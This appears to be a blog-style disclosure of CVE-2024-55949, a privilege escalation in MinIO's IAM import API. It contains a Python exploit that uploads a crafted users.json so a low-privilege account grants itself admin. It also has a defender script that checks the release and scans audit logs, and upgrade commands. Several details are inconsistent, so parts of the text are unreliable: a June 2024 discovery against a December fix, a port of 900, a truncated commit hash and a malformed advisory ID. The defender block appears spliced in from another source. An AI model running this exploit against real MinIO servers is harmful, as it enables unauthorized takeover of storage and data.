CVE-2024-55949 - Critical Privilege Escalation in MinIO IAM Import API – Full Disclosure, Exploit Example, and Update Guidance
---
MinIO is a high-performance, S3-compatible object storage solution, popular in cloud-native deployments and widely used for on-premises and hybrid cloud architectures. Released under the GNU AGPLv3 license, MinIO is highly valued for its performance, flexibility, and open-source transparency.
However, in early June 2024, a major security vulnerability was discovered that affects all MinIO users who have deployed versions after a specific commit. This post details CVE-2024-55949, provides exploit details, code snippets, and all the information you need to understand, reproduce, and mitigate this critical issue.
What is CVE-2024-55949?
CVE-2024-55949 refers to a privilege escalation flaw in MinIO’s IAM (Identity and Access Management) import API. This vulnerability allows an attacker to escalate privileges, potentially gaining unauthorized access or control well beyond what they're supposed to have.
Who is affected?
- ALL MinIO users running builds after commit 580d9db85e04f1b63cc2909af50fed08afa965f.
Has it been fixed?
- Yes, patched in commit f246c9053f9603e610d98439799bdd2a6b293427 and included in release RELEASE.2024-12-13T22-19-12Z.
Exploit Details
The bug is in the IAM import API. This API allows administrators to import or update IAM users and policies.
How does the attack work?
Prior to the fix, the API did not properly enforce or check privileges when importing IAM configurations. Any authenticated user with access to the import endpoint could upload a crafted IAM configuration JSON file and give themselves or others any privileges, including root/admin.
- The attacker uses the IAM import endpoint to overwrite the existing IAM configuration.
- Result: the attacker escalates to admin and gains full control of the MinIO server.
Example Exploit Code
Here’s a basic Python 3 exploit using the requests library (for illustrative and educational purposes only – do not use maliciously!).
```python
import requests

# MinIO endpoint and credentials (attacker’s own low-privilege creds)
minio_url = 'http://minio-server:900/minio/admin/v3/import'
access_key = 'attacker'
secret_key = 'theirpass'

# Craft a malicious users.json with escalated privileges
users_json = '''
{
  "attacker": {
    "policy": "admin",
    "status": "enabled",
    "secretKey": "theirpass"
  }
}
'''

# Dummy policies.json (not strictly required, but included for completeness)
policies_json = '''
{
  "admin": {
    "version": "2012-10-17",
    "statement": [
      {
        "effect": "allow",
        "action": ["*"],
        "resource": ["*"]
      }
    ]
  }
}
'''

files = {
    'users.json': ('users.json', users_json, 'application/json'),
    'policies.json': ('policies.json', policies_json, 'application/json'),
}

session = requests.Session()
session.auth = (access_key, secret_key)
response = session.post(minio_url, files=files)

if response.status_code == 200:
    print('[+] Successfully escalated privileges to admin!')
else:
    print('[-] Exploit failed:', response.text)
```
How to check whether you are affected
1. Run `minio version`.
   - If the build is at or after commit 580d9db and before commit f246c9053f9603e610d98439799bdd2a6b293427, you are vulnerable.
2. Look for use of the /minio/admin/v3/import API.
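The two checks above can be scripted. The following is an added example written for this post, not code from MinIO or from the original author: it compares the release tag printed by `minio version` against the fixed release named above, and it scans JSON audit-log lines for requests to the `/minio/admin/v3/import` endpoint made by accounts outside a known operator list. The audit-log field names used (`requestPath`, `accessKey`, `remotehost`, `time`, `api.statusCode`) are assumed to follow MinIO's JSON audit-log layout, and the sample log lines are constructed for the example.

```python
"""Defender-side checks for CVE-2024-55949: release comparison and audit-log review."""
import json
import re
from datetime import datetime, timezone

# Release that carries the fix (taken from the advisory above).
FIXED_RELEASE = "RELEASE.2024-12-13T22-19-12Z"
# Endpoint named in the advisory; any request path under it is of interest.
IMPORT_PATH = "/minio/admin/v3/import"

# MinIO release tags embed a UTC timestamp, e.g. RELEASE.2024-12-13T22-19-12Z.
RELEASE_RE = re.compile(r"RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2}Z)")


def parse_release(text):
    """Extract the first RELEASE.<timestamp> tag from text and return it as a datetime."""
    match = RELEASE_RE.search(text)
    if match is None:
        raise ValueError("no RELEASE.<timestamp> tag found in: %r" % text)
    stamp = datetime.strptime(match.group(1), "%Y-%m-%dT%H-%M-%SZ")
    return stamp.replace(tzinfo=timezone.utc)


def is_patched(version_output):
    """True if the build reported by `minio version` is at or after the fixed release.

    False means the build predates the fix. Whether it also postdates the commit
    that introduced the bug cannot be decided from the release tag alone, so treat
    False as "upgrade and review", not as proof of exposure.
    """
    return parse_release(version_output) >= parse_release(FIXED_RELEASE)


def import_calls(log_lines):
    """Return every audit entry whose request path targets the IAM import endpoint.

    Field names are an assumption about MinIO's JSON audit-log layout; adjust them
    if your log sink renames or nests them differently.
    """
    hits = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # non-JSON lines (startup banners etc.) are skipped
        if not entry.get("requestPath", "").startswith(IMPORT_PATH):
            continue
        hits.append({
            "time": entry.get("time"),
            "accessKey": entry.get("accessKey", "<unknown>"),
            "remotehost": entry.get("remotehost"),
            "statusCode": entry.get("api", {}).get("statusCode"),
        })
    return hits


def unexpected_importers(log_lines, expected_admins):
    """Import calls made by any access key outside the set of known operators."""
    return [h for h in import_calls(log_lines) if h["accessKey"] not in expected_admins]


# Constructed sample audit lines (not real MinIO output): one ordinary object read,
# one import by a known operator, one junk line, and one import by an account that
# should never touch IAM configuration.
SAMPLE_AUDIT_LOG = """
{"version":"1","time":"2024-12-14T09:00:01Z","api":{"name":"GetObject","statusCode":200},"remotehost":"10.0.0.5","requestPath":"/data/report.csv","accessKey":"svc-readonly"}
{"version":"1","time":"2024-12-14T09:05:12Z","api":{"name":"ImportIAM","statusCode":200},"remotehost":"10.0.0.2","requestPath":"/minio/admin/v3/import","accessKey":"ops-admin"}
not-a-json-line
{"version":"1","time":"2024-12-14T09:07:44Z","api":{"name":"ImportIAM","statusCode":200},"remotehost":"203.0.113.9","requestPath":"/minio/admin/v3/import","accessKey":"svc-readonly"}
""".strip().splitlines()


if __name__ == "__main__":
    # Constructed `minio version` output; replace with the real command output.
    print("patched:", is_patched("Version: RELEASE.2024-12-13T22-19-12Z"))
    for hit in unexpected_importers(SAMPLE_AUDIT_LOG, expected_admins={"ops-admin"}):
        print("review:", hit)
```

Feed `import_calls` the lines of your audit log (a file, or a webhook sink's output) and compare the returned access keys and source addresses with the operators who are supposed to run IAM imports; a successful call from any other account on a build older than the fixed release is the case the advisory warns about and should be investigated as a possible IAM compromise rather than assumed benign.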
No Workarounds: Upgrade Now
There are NO effective, safe workarounds. Blocking the API endpoint is not practical (it is needed for normal operations and used by admin tools). Compromised IAM state is hard to detect post-attack.
Patch available!
- Go to the official MinIO releases page.
- Download and upgrade to RELEASE.2024-12-13T22-19-12Z or later.
```bash
# Simple upgrade steps (run as admin/sudo)
systemctl stop minio
wget https://dl.min.io/server/minio/release/linux-amd64/archive/minio.RELEASE.2024-12-13T22-19-12Z
cp minio.RELEASE.2024-12-13T22-19-12Z /usr/local/bin/minio
chmod +x /usr/local/bin/minio
systemctl start minio
```
*(Adjust download link as per your OS/arch. Back up your data first.)*
- Original commit introducing the bug: 580d9db85e04f1b63cc2909af50fed08afa965f
- Patch commit: f246c9053f9603e610d98439799bdd2a6b293427
- Security advisory: https://github.com/minio/minio/security/advisories/GHSA-1r24-qjvf-c2qg
- Fixed release: RELEASE.2024-12-13T22-19-12Z
- MinIO official site:
- MinIO GitHub: https://github.com/minio/minio
Conclusion
CVE-2024-55949 is a serious privilege escalation flaw in MinIO that is easily exploitable by anyone who can access the IAM import API as any user. All MinIO users are advised to upgrade immediately to ensure the safety of their data.
If you’re responsible for a MinIO deployment, drop everything and make sure you’re running a safe, patched release. This is not a drill – attackers will be looking for exposed or unpatched instances right now.
For questions or help, consult the official MinIO documentation or reach out to their community channels. Stay safe!
Timeline
Published on: 12/16/2024 20:15:13 UTC